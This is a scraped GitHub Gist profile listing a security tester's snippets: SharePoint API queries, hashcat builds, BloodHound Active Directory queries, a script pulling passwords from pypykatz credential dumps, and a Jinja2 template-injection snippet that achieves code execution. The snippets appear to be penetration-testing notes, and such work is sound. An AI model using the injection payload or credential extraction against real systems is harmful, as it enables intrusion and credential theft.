Skip to content

Instantly share code, notes, and snippets.

View FrankSpierings's full-sized avatar

Frank Spierings FrankSpierings

57 followers · 1 following
View GitHub Profile
@FrankSpierings
FrankSpierings / sps-grab-SPSPeople-info.py
Last active March 11, 2020 14:25
Retrieve all properties for a SharePoint document(type)
import requests
import json
url = 'https://server/_api/search/postquery'
# X-RequestDigest required for Anti XSRF
headers = {
'X-RequestDigest':'0x4CF763CCDD37BC34BCEBC236D8C3A14D2B0852792487F30E57C9C46F668D31D461ED7C61FBA3D52DA19ACC6F797EED95B243A414D7A1BA6C736BDBD50A0D0A83,09 Mar 2020 13:32:05 -0000',
'Content-Type': 'application/json;odata=verbose',
@FrankSpierings
FrankSpierings / hashcat-crosscompile-windows.md
Created February 29, 2020 11:28

Outside container

NAME=winbuild; docker run --rm -it --name ${NAME} --hostname ${NAME} -v /tmp/data:/tmp/data ubuntu bash

Inside container

apt update -y
apt install -y build-essential git make mingw-w64 win-iconv-mingw-w64-dev
cd /tmp/data
@FrankSpierings
FrankSpierings / README.md
Last active September 20, 2024 16:52
Raspberry PI - Wireless Capture Setup

Raspberry Pi Wireless Captures

From Host

  • Install using Raspberry Pi Manager; brew install raspberry-pi-imager

    • Configure ssh access
    • Configure initial wireless access

  • Additional access

  • Via serial console over usb; g_serial

@FrankSpierings
FrankSpierings / BloodHound.Cypher.Neo4j.md
Created February 24, 2020 20:25
Bloodhound

Match all users

MATCH (n:User) return n

Find users with a description

MATCH (n:User) WHERE n.description IS NOT NULL RETURN n
@FrankSpierings
FrankSpierings / extract-pypykatz-creds.py
Last active February 25, 2020 06:11
Only want the credentials from pypykatz
import json
filenames = []
def findcred(dictionary):
for k, v in dictionary.items():
if k == 'password' and dictionary['password']:
result = {}
if 'domainname' in dictionary:
result['domainname'] = dictionary['domainname']
@FrankSpierings
FrankSpierings / fw-example-netns.sh
Last active February 6, 2020 08:29
Network Namespaces - One host
#!/bin/bash
BRIDGE=br-ns
# Create switch
# ------------------
brctl addbr "${BRIDGE}"
brctl stp "${BRIDGE}" off
ip link set dev $BRIDGE up
@FrankSpierings
FrankSpierings / func-params.py
Created February 3, 2020 19:20
Ghidra Script - Example of showing function call parameters within a function using the decompiler.
#Example of showing function call parameters within a function using the decompiler.
#@author Frank Spierings
#@category
#@keybinding
#@menupath
#@toolbar
import ghidra.app.decompiler.DecompInterface as DecompInterface
import ghidra.app.decompiler.ClangTokenGroup as ClangTokenGroup
@FrankSpierings
FrankSpierings / README.MD
Last active June 27, 2024 12:34
Setup ed25199 YubiKey for SSH (OSX)

YubiKey SSH/GPG

Configure GPG PIN's

  • Change the card user and admin PIN's
$ gpg --edit-card

gpg/card> admin
@FrankSpierings
FrankSpierings / README.md
Created January 13, 2020 14:51
Burp Certificate - Android Emulator System Store

Generate certificate

openssl req -x509 -days 365 -nodes -newkey rsa:2048 -outform der -keyout server.key -out ca.der

Convert certificate and key

openssl rsa -in server.key -inform pem -out server.key.der -outform der
@FrankSpierings
FrankSpierings / jinja-rce-.py
Created December 23, 2019 09:51
Jinja2 Code Exec
import jinja2
# t = 'Variable {{ arg }}\n{% set a = arg.__class__.__base__.__subclasses__() %}{% for i in a %}{{ i }}\n{% endfor %}'
t = 'Variable {{ arg }}\n{{ arg.__class__.__base__.__subclasses__()[-36]("id") }}'
template = jinja2.Template(t)
r = template.render(arg="testing")
print(r)